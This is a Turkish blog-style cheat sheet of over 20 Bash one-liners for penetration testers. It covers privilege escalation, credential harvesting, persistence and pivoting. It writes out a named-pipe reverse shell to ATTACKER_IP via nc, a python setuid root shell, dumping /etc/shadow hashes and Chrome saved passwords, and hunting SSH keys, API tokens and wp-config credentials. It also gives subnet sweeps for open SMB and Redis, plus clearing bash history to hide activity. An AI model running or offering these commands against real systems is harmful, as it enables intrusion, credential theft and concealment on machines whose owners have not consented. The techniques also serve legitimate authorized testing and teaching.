İçerik
Çoğu pentester temel Bash cheat sheet hilelerini biliyor – ama gerçek profesyoneller ipconfig
ve ip a
ötesine geçiyor. İşte recon, privilege escalation, persistence ve data exfiltration konularını kapsayan 20+ Bash one-liner ile daha büyük, daha iyi, Kali-Linux odaklı bir cheat sheet. Bunları çalıştırdıktan sonra ne olacağını ve hacking becerilerinizi nasıl geliştireceğini açıklıyorum.

Gelişmiş Pentester Bash Cheat Sheet One-Liner’ları
SUID Binary’leri Bulma (Privilege Escalation)
find / -type f -perm -4000 2>/dev/null
Sonuç: SUID set edilmiş binary’leri listeler (dosya sahibi olarak çalışır).
Hack Değeri: Saldırganlar root shell spawn etmek için kullanılabilecek yanlış configure edilmiş binary’leri (nmap
, vim
gibi) arar.
Capability’leri Arama (Linux Priv Esc)
getcap -r / 2>/dev/null
Sonuç: Linux capability’leri olan dosyaları listeler (cap_setuid+ep
gibi).
Hack Değeri: Bazen capability-enabled binary’yi (setuid capability’si olan python3
gibi) abuse ederek privilege escalate edebilirsiniz.
Yazılabilir Cron Job’ları Bulma
grep -R "" /etc/cron* 2>/dev/null
Sonuç: Cron job tanımlarını gösterir.
Hack Değeri: Yazabileceğiniz bir script bulursanız, cron job çalıştığında root olarak kod execution almak için içeriğini değiştirebilirsiniz.
PID’lerle Çalışan Service’leri Enumerate Etme
ps aux | awk '{print $1,$2,$11}' | sort | uniq
Sonuç: Kimin hangi process’i çalıştırdığını gösterir.
Hack Değeri: Saldırganlara ilginç service’leri (MySQL, Redis, Tomcat gibi) ve sahiplerini spot etmede yardım eder – privilege escalation için altın madeni.
SSH Key’lerini Arama
find / -name "id_rsa" 2>/dev/null
Sonuç: SSH private key’lerini listeler.
Hack Değeri: Key’i alıp network’teki diğer makinelere pivot yapmak için kullanın.
/etc/shadow’dan Hash Çıkarma (Root İse)
cat /etc/shadow | awk -F: '{print $1 ":" $2}'
Sonuç: username:hash çiftlerini dump eder.
Hack Değeri: hashcat
veya john
ile offline password cracking imkanı. Lateral movement için harika.
ARP Table’dan Internal IP’leri Alma
arp -a | awk '{print $2}' | tr -d '()'
Sonuç: Internal network host’larını print eder.
Hack Değeri: Saldırganlar pivot target’ları bulmak ve attack surface’i genişletmek için kullanır.
Environment Variable’ları Dump Etme
printenv
Sonuç: Tüm environment variable’ları gösterir.
Hack Değeri: Bazen database credential’ları, API token’ları, AWS key’leri içerir – kolay ganimet.
Açık SMB Share’leri Tarama
for i in {1..254}; do smbclient -L 192.168.1.$i -N 2>/dev/null; done
Sonuç: Her live host’ta SMB share’lerini listeler.
Hack Değeri: Public share’lere erişim, sensitive data çekme, lateral movement için cred bulma.
Kurulu Package’ları Enumerate Etme
dpkg -l | awk '{print $2}' | grep -E 'mysql|php|apache'
Sonuç: Kurulu package’ları gösterir.
Hack Değeri: Service’leri fingerprint etmeye ve version-based exploit’leri spot etmeye yardım eder.
WordPress Config Dosyalarını Tarama
find /var/www -name "wp-config.php" 2>/dev/null
Sonuç: WordPress config dosyalarını bulur.
Hack Değeri: Genellikle DB credential’ları içerir – DB’ye pivot, user/password dump, escalate.
Python ile Root Shell Spawn Etme
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Sonuç: Python setuid capability’si varsa veya cron’da root olarak çalışıyorsa root shell verir.
Hack Değeri: Privilege escalation için misconfiguration’ları exploit eder.
Son Zamanlarda Değiştirilmiş Dosyaları Bulma
find / -type f -mtime -1 2>/dev/null
Sonuç: Son 24 saatte değişen dosyaları listeler.
Hack Değeri: Yeni drop edilmiş log’ları, credential’ları veya backup’ları keşfetmek için iyi.
Tüm Yazılabilir Directory’leri Bulma
find / -type d -perm -0002 2>/dev/null
Sonuç: World-writable directory’leri gösterir.
Hack Değeri: Saldırganlar cron job’ları veya service’leri hijack etmek için oraya payload veya malicious script’ler drop eder.
Named Pipe Üzerinden Reverse Shell
mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP 4444 > /tmp/f
Sonuç: FIFO pipe kullanarak gizli reverse shell oluşturur.
Hack Değeri: Düz Bash reverse shell’den daha evasive, bazen security monitoring’i bypass eder.
Dosya Değişikliklerini Real Time Monitoring
inotifywait -m /etc
Sonuç: /etc
‘deki dosyalar değiştiğinde print eder.
Hack Değeri: Persistence için harika – defender’ların config’leri edit ettiğini monitor edin veya yeni oluşturulan credential’ları izleyin.
Kodda Hardcoded Secret’ları Grep’leme
grep -R "SECRET_KEY\|API_KEY" /var/www 2>/dev/null
Sonuç: Web app’lerde API veya secret key’li satırları listeler.
Hack Değeri: Saldırganlar sızan key’leri lateral movement veya cloud account takeover için abuse edebilir.
Chrome Kayıtlı Şifrelerini Çıkarma
sqlite3 ~/.config/google-chrome/Default/Login\ Data "SELECT origin_url, username_value, password_value FROM logins;"
Sonuç: Stored Chrome login’lerini dump eder (şifreler encrypted ama key mevcutsa decrypt edilebilir).
Hack Değeri: Web portal’ları için credential’ları almak için mükemmel post-exploitation adımı.
Sticky Bit’li Executable’ları Bulma
find / -type f -perm -1000 2>/dev/null
Sonuç: Sticky bit executable’larını listeler.
Hack Değeri: Nadir ama yanlış configure edilmişse privilege-escalation vector’ları ortaya çıkarabilir.
Açık Redis Instance’larını Tarama
for i in {1..254}; do (echo -e "PING\r\n" | nc -w 1 192.168.1.$i 6379 | grep PONG && echo "Redis open at $i") & done
Sonuç: Live Redis server’larını gösterir.
Hack Değeri: Redis unauthenticated ise, saldırganlar instant root access için /root/.ssh/authorized_keys
‘e SSH key’leri yazabilir.
Exposed History Kontrolü
cat ~/.bash_history
Sonuç: User’ın komut geçmişini dump eder.
Hack Değeri: Birçok admin yanlışlıkla password veya internal komutlar yazar – instant intelligence.
İzlerinizi Silme (Stealth)
history -c && history -w
Sonuç: Bash history dosyasını temizler.
Hack Değeri: Saldırganlar exploitation sonrası aktivitelerini gizlemek için kullanır.
Root’a Ait İlginç Dosyaları Enumerate Etme
find / -user root -type f 2>/dev/null | grep -E "conf|key|cfg|secret"
Sonuç: Sensitive root-owned config dosyalarını gösterir.
Hack Değeri: Saldırganlar daha fazla escalate etmek için SSH key’leri, DB config’leri, secret token’ları arar.
Hızlı Pivot Proxy Oluşturma
ssh -D 1080 user@compromised_host
Sonuç: Compromised host üzerinden SOCKS proxy açar.
Hack Değeri: Pentester’ların kendi makinelerinden internal network’leri pivot edip taramasına izin verir.
Bu Gelişmiş Bash Cheat Sheet Komutları Neden Önemli
Çoğu junior pentester temel enumeration’da kalır. Ama gelişmiş Bash one-liner’ları şunları yapmanızı sağlar:
- Diğer scanner’ların kaçırdığı gizli misconfiguration’ları bulma
- Privilege escalation check’lerini hızla otomatikleştirme
- Real-world red teaming’de data exfiltrate etme ve stealth sürdürme
- Ağır tool’lar drop etmeden network’ler arası pivot yapma
Bunları geliştirmek sizi daha hızlı, daha gizli ve çok daha tehlikeli (authorized engagement’larda) yapacak.
Sonuç
Bu Bash cheat sheet ile artık gerçek pentester seviyesinde one-liner’lara sahipsiniz. Temel komutlardan çok daha ötede, privilege escalation, persistence ve stealth teknikleri için kullanabileceğiniz güçlü araçlar.
Bu komutları authorized penetration testing’de kullanarak becerilerinizi geliştirebilirsiniz. Her birini deneyip nasıl çalıştığını öğrenmek, gerçek dünya senaryolarında çok işinize yarayacak.
İlginizi çekerse 5 Linux Networking Komutu – Muhtemelen Az Duyduğunuz Network Araçları yazıma da göz atabilirsiniz;